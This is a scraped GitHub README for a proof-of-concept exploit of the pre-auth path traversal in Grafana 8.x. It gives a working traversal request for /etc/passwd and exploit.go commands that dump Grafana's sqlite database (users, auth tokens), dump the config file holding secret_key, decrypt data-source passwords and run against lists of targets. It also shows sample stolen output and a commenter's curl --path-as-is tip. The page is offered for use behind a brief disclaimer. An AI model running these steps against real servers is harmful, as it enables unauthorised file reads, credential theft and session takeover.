PoC for Grafana 8.x Local File Inclusion (Pre-Auth)

Grafana 8.x Local File Inclusion (Pre-Auth)

CVE: Pending

All credits go to j0v and his tweet https://twitter.com/j0v0x0/status/1466845212626542607

Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

In good faith, I've held back releasing this PoC until either this vulnerability is public or a patch is available.

Table of Content

Explanation

I noticed a tweet by j0v claiming to have found a Grafana path traversal bug. Out of curiosity, I started looking at the Grafana source code. In the tweet, it was mentioned it was a pre-auth bug. There are only a couple of public API endpoints in Grafana, and only one of those took a file path from the user.

Grafana has a public API endpoint, /public/plugins/:pluginId, which allows you to view a plugin's assets. This works by providing a valid :pluginId and then specifying the file path, such as img/logo.png. However, Grafana fails to sanitize the user provided file path, leading to path traversal.

The directory being accessed is at <grafana>/public/app/plugins/panel/<pluginId>. On a standard Grafana installation, the Grafana data directory is /usr/share/grafana. So by going back 8 directories, you can reach the filesystem root directory.

HTTP Request:

GET -  http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

Offending Code: https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284

Note: This does not work in the browser or in curl (not sure why)

Attack Vectors

These are some attacks that can be carried out using this vulnerability

Dumping Sqlite Database

Grafana, by default, uses a sqlite3 database. This is stored in /var/lib/grafana/grafana.db. You can use the exploit.go script to dump this database

Example:

go run exploit.go -target http://localhost:3000 -dump-database -output grafana.db

You can then read this database to obtain users, auth tokens, and data sources.

Dumping defaults.ini Config File

Grafana stores its configuration in a <grafana>/conf/defaults.ini file. There are a couple of interesting values here such as secret_key, host user password if using mysql isntead of sqlite3.

Example:

go run exploit.go -target http://localhost:3000 -dump-config -output defaults.ini

Reference: https://grafana.com/docs/grafana/latest/administration/configuration/

Decrypting Datasource Passwords

Grafana encrypts all data source passwords using AES-256-CBC using the secret_key in the defaults.ini config file. We can dump this config file, as shown above, and then decrypt the values from the database.

Reference: https://grafana.com/docs/grafana/latest/administration/configuration/#secret_key

Session Takeover

Grafana stores session tokens in the table auth_tokens. I haven't been able to take over a session, but if you read the source code, you could figure it out.

Exploit Script

Example

root@localhost:/# go run exploit.go -target http://localhost:3000 -file /etc/passwd
Grafana 8.x Local File Inclusion (Pre-Auth)
Made by Tay (https://github.com/taythebot)

[INFO] Exploiting target http://localhost:3000
[INFO] Successfully exploited target http://localhost:3000
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:Linux User,,,:/home/grafana:/sbin/nologin

Single Target

go run exploit.go -target <target> -file <path>

Output to file

go run exploit.go -target <target> -file <path> -output <file>

Note: Does not work with multiple targets

Multiple Targets

go run exploit.go -list <list> -file <path>

Dump defaults.ini

go run exploit.go -target <target> -dump-config

Dump sqlite3 database

go run exploit.go -target <target> -dump-database

Build

make build
Owner
Tay
Fullstack developer focusing on Go and Javascript. I sometimes write PHP in shame...
Tay
Similar Resources

Graph and alert on '.rrd' data using grafana, RRDTool and RRDSrv.

Grafana RRD Datasource A grafana datasource for reading '.rrd' files via RRDTool and RRDsrv. With this datasource you will be able to create grafana d

Oct 12, 2022

Download your Fitbit weight history and connect to InfluxDB and Grafana

WemonFit Weight monitoring for Fitbit, using InfluxDB and Grafana Generating a new certificate openssl req -new -newkey rsa:2048 -nodes -keyout lo

Oct 22, 2022

Grafana DB2 Data Source Backend Plugin

Grafana DB2 Data Source Backend Plugin This template is a starting point for building Grafana Data Source Backend Plugins What is Grafana Data Source

Dec 13, 2021

Otus prometheus grafana for golang

HW Prometheus. Grafana Clone the repo: git clone https://github.com/alikhanmurzayev/otus_kuber_part_3.git && cd otus_kuber_part_3 Prepare workspace: m

Dec 17, 2021

Cole - Cole can use his sixth sense to give you metrics about your Grafana dashboards

Cole Cole can use his sixth sense to give you metrics about your Grafana dashboa

Nov 9, 2022

Grafana Data Source Backend Plugin Template

Grafana Data Source Backend Plugin Template This template is a starting point for building Grafana Data Source Backend Plugins What is Grafana Data So

Jan 16, 2022

Amplitude-exporter - Amplitude charts to prometheus exporter PoC

Amplitude exporter Amplitude charts to prometheus exporter PoC. Work in progress

May 26, 2022

Grafana Data Source Backend Plugin

Grafana Data Source Backend Plugin

Grafana Data Source Backend Plugin This plugin allows you to receive telemetry i

Sep 18, 2022

Flux prometheus grafana-example - A tool for keeping Kubernetes clusters in sync with sources ofconfiguration

Flux prometheus grafana-example - A tool for keeping Kubernetes clusters in sync with sources ofconfiguration

Flux is a tool for keeping Kubernetes clusters in sync with sources of configuration (like Git repositories), and automating updates to configuration when there is new code to deploy.

Feb 1, 2022
Comments
  • Add instructions for POC with curl

    Add instructions for POC with curl

    I figured out why this couldn't be tested using a browser or curl: they both automatically collapse instances of ../ in the path.

    But there is an easy way to test this with curl using the --path-as-is argument. I updated the note with this example so it's easy to check whether an instance is vulnerable without having to use an extra tool

Snowflake grafana datasource plugin allows Snowflake data to be visually represented in Grafana dashboards.
Snowflake grafana datasource plugin allows Snowflake data to be visually represented in Grafana dashboards.

Snowflake Grafana Data Source With the Snowflake plugin, you can visualize your Snowflake data in Grafana and build awesome chart. Get started with th

Dec 29, 2022
A Grafana backend plugin for automatic synchronization of dashboard between multiple Grafana instances.

Grafana Dashboard Synchronization Backend Plugin A Grafana backend plugin for automatic synchronization of dashboard between multiple Grafana instance

Dec 23, 2022
Terraform-grafana-dashboard - Grafana dashboard Terraform module

terraform-grafana-dashboard terraform-grafana-dashboard for project Requirements

May 2, 2022
Grafana-threema-forwarder - Alert forwarder from Grafana webhooks to Threema wire messages

Grafana to Threema alert forwarder Although Grafana has built in support for pus

Nov 11, 2022
Grafana Unauthorized arbitrary file reading vulnerability
Grafana Unauthorized arbitrary file reading vulnerability

CVE-2021-43798 Grafana Unauthorized arbitrary file reading vulnerability 8.3.1 (2021-12-07) Security: Fixes CVE-2021-43798 . For more information, see

Dec 25, 2022
A Kubernetes Operator used for pre-scaling applications in anticipation of load

Pre-Scaling Kubernetes Operator Built out of necessity, the Operator helps pre-scale applications in anticipation of load. At its core, it manages a c

Oct 14, 2021
An implementaion of PRE with publicly verification

An implementaion of PRE with publicly verification Proxy Re-Encryption with publicly verification, pre in short, is proposed in Signcryption of proxy

Aug 19, 2022
Local Storage is one of HwameiStor components. It will provision the local LVM volume.
Local Storage is one of HwameiStor components. It will provision the local LVM volume.

Local Storage Module English | Simplified_Chinese Introduction Local Storage is one of modules of HwameiStor which is a cloud native local storage sys

Aug 6, 2022
Grafana Tempo is a high volume, minimal dependency distributed tracing backend.
Grafana Tempo is a high volume, minimal dependency distributed tracing backend.

Grafana Tempo is an open source, easy-to-use and high-scale distributed tracing backend. Tempo is cost-efficient, requiring only object storage to ope

Jan 8, 2023
Grafana Dashboard Manager

Grafana dash-n-grab Grafana Dash-n-Grab (GDG) -- Dashboard/DataSource Manager. The purpose of this project is to provide an easy to use CLI to interac

Dec 31, 2022